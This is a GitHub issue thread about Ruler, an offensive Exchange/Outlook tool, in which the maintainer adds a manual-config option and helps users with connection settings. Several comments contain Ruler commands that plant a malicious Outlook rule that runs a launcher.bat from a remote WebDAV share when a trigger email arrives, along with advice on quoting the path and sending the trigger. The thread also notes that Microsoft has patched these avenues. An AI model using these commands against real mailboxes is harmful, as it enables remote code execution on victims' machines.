-
Notifications
You must be signed in to change notification settings - Fork 357
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
No autodiscover.xml #31
Comments
Hi Thank you, I hope it's been of use. Unfortunately no, there is no way as there as specific values coming out of the autodiscover.xml that are required. In particular the DN for the user
This is required for the MAPI authenticate happening, and is separated from the usual user credentials. I haven't found a way to get this value other than through the autodiscover unfortunately. I would try look around at other possible locations such as:
^ the last one might be relevant as I see that you receive a 301 from the first discover request, which ruler may not be following correctly (although it should) hope this helps! |
Hi, Thank you for your quick reply. Yes, the tool seems fantastic, this is the first time I'm using it. Since I have already access through OWA I know that information. I'm referring to:
I think we could have another argument to input that string if that's the only think the tool is getting from discover.xml. What would be your thoughts on that? Also, thank you for your suggestions, I tried all those places and others. Unfortunately, I'm certain the discover.xml file does not exist. It is interesting that the HTTP code is 301, because in that location there is nothing. Thank you |
In that case, it may be possible. Especially if it is using MAPI/HTTP. I have a feeling there might be an issue, for RPC/HTTP, with locating the rpcproxy end-point without the server info from autodiscover. But all the information can in theory be supplied manually. Tomorrow I will have some time to dig into it, maybe I'll add an option to supply a config file with the required info, that could work nicely. |
That's fantastic, I will keep a watch on the tool for that next version. Theoretically, it should solve this problem about no having a autodiscover.xml resource. Thank you very much |
I've created a new branch: https://github.com/sensepost/ruler/tree/manualconfig If you have time and are able to build, it would be great if you can test it out. Alternatively if you can tell me what OS you are using, I can supply a pre-built binary. config options override the command-line options, if they are set. The important ones are:
If RPC is used, you need to set the RPC url and set
the Mailbox is : For the RPCURL and MAPI URL, the values need to be the full path, upto the arguments. basically the same as they are in the current config file. To specify the config: |
I'm impressed. You did this really quickly. Thank you, I will try to build it and test it. Also, I'm running this tool in Kali Linux |
https://github.com/sensepost/ruler/releases/tag/2.1.5 :) Happy to add features! Normally I only find out that Ruler is being used when something breaks. |
Awesome, thank you for the new branch. :-D I was looking at your config.tml file and I tried to replicate the format as much as possible with my information, but I'm getting the following:
It may be the way I'm setting the parameters. What would be your suggestion? Also, I noticed that even thought the email, username, and password are set in the config file the tool still expects those parameters to be set on the command line. |
I'll fix the ordering of the params. My current config looks as follows.
A good test would be to go to the RPC url in browser, authenticate and see if you get a 503 error, it is correct. The mailbox needs to be a GUID @ domain |
Thank you for all the info you have been very helpful. Unfortunately, I'm not able to run the tool successfully. It can also be that the GUID. I think I have is not correct. Not sure since in OWA I only see the "Exchange mailbox address", which is in the format:
I equate that to the "userdn" in the tool. The rest of the parameters mailbox (GUID@domain) could be obtained from there, but I haven't been successful. And I may not even have the right mapiurl either . :/ In any case, in my last run I encounter this:
I was running it with "rpc: true" |
I got a feeling the So those are two things I'll dig into,
I'll mess around with this over the next few days 👍 I do like this feature, I've already used it myself! thanks for getting me to look into it |
Ok, I've found a way to get some of the info you need. In OWA, you need to go to Options -> About From there you need the following info: Still searching for info on the RPC / MAPI URLs 👍 |
Thank you for the info! :) . I was using exactly that information from the Options/About tab. But, I wasn't sure of the "mailbox" value, so it is good to confirm. I'm still getting the same problem.
I think it may have to do with the MAPI url. Thank you for taking the time to address this. |
One last try :) I've just had it work for me, so maybe you get lucky as well. There is a pretty good chance that RPC is on the same host as OWA.. so simply add the owa host in the rpcurl I'm pushing updated binaries for Ruler, the config file has an additional line option you'll need to set:
|
Thank you! I will give it a try once you the latest binary. Update: I see you just put it...great!! |
Hi, Just wondering if you can help with the following please? Awesome tool by the way. ./ruler-linux64 --noencrypt --config config.yml check[+] Binding to RPC ./ruler-linux64 --encrypt --config config.yml checkIncorrect Usage. flag provided but not defined: -encrypt NAME: Thanks very much. |
Hi and thanks! The output of To control the encryption you can use the config file (which I see you already are):
If this doesn't work, running with |
I removed the domain from the config and I'm in. Really do appreciate the fast response, the root is calling ;) |
awesome! Happy pwnage Friday! 🎉 😄 😈 |
Not quite yet :-) ./ruler-linux64 --verbose --debug --config config.yml --username bob.smith --name troopers --trigger troopers17 --location "\\192.168.1.10\w\launcher.zip\launcher.bat" --sendIncorrect Usage. flag provided but not defined: -name There doesn't seem to be any reference to --name --trigger --location and the requirements for these flags? I pulled this command from the video on YouTube. Thanks again for your help. |
I think I have worked it out now with the ./ruler add --help command. The only thing I am struggling with is the --location tab for an internet facing host? I have used the following: --location "\\192.168.13.37\w\launcher.zip\launcher.bat" But this isn't touching the webdav logs? Thanks. |
The location's slashes need to be doubled up when using so: or if using single quotes: |
Excellent thanks, I had a feeling after I posted. It is now running but ruler seems to hang on: [+] Auto Send enabled, wait 30 seconds before sending email (synchronisation) Not getting the: [+] Message sent I am collaborating with the client and there should be no restriction on the FW, the only thing I can think is AV is catching the launcher? |
strange that the send isn't happening, this should be independent of AV. You could try to either manually send an email with the correct trigger in the subject (say from your company address) or you can try with the
|
That worked a treat, seems after logging into Outlook there is an error with the rule. Upon investigation it looks like Microsoft have patched Outlook to not run scripts by default.
https://support.microsoft.com/en-gb/help/3191883/may-2-2017-update-for-outlook-2016-kb3191883 Thanks again for the support. So near yet so far haha. |
Yes that is correct, they patched rules, and a little while later the forms avenue as well. The homepage patch came out last year September as well. It is probably worth verifying that the other patches have also been applied. Fortunately/Unfortunately they have been shutting down this avenue, so if companies are diligent in applying patches for Office, they should be protected. |
Hi,
Thank you for this awesome tool.
I wonder if there is a way to set the parameter that normally would be parsed from the discover.xml?
My problem is that the Exchange server is not well configured and the discover.xml does not exist. I keep getting the following error.
./ruler-linux64 --email email@address --username name --password Password --basic --verbose check
[+] Retrieving MAPI/HTTP info
[] Autodiscover step 0 - URL: https://domain/autodiscover/autodiscover.xml
ERROR: 2017/05/04 15:09:35 Failed, StatusCode [301]
[] Autodiscover step 1 - URL: https://autodiscover.domain/autodiscover/autodiscover.xml
[*] Autodiscover step 2 - URL: http://autodiscover.domain/autodiscover/autodiscover.xml
ERROR: 2017/05/04 15:09:36 Failed, StatusCode [404]
ERROR: 2017/05/04 15:09:36 The autodiscover service request did not complete.
Permission Denied or URL not found: StatusCode [404]
I know I could set the URI with --url, but the problem is that there is no discover.xml.
Thank you
The text was updated successfully, but these errors were encountered: